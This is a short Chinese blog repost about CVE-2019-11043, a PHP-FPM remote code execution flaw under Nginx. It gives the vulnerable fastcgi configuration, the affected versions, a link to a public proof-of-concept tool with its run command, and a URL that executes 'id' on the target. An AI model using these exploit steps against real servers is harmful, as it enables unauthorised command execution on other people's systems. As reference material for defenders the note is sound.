应用安全 - 编程语言漏洞 - PHP语言漏洞汇总

时间：2019-10-24 23:21:46 阅读：88 评论：0 收藏：0 [点我收藏+]

CVE-2019-11043

Date：
2019.9.16

类型：
远程代码执行

前置条件：

Nginx + fastcgi + php-fpm

配置文件信息如下：
location ~ [^/]\.php(/|$) {
  ...
  fastcgi_split_path_info ^(.+?\.php)(/.*)$;
  fastcgi_param PATH_INFO       $fastcgi_path_info;
  fastcgi_pass   php:9000;
  ...
}

影响范围：
version>php 7, php5(EXP暂无)

PoC:
https://github.com/neex/phuip-fpizdam
go run . "http://ip:8080/index.php"

ExP:
http://ip:8080/index.php?a=id

应用安全 - 编程语言漏洞 - PHP语言漏洞汇总

原文：https://www.cnblogs.com/AtesetEnginner/p/11735653.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)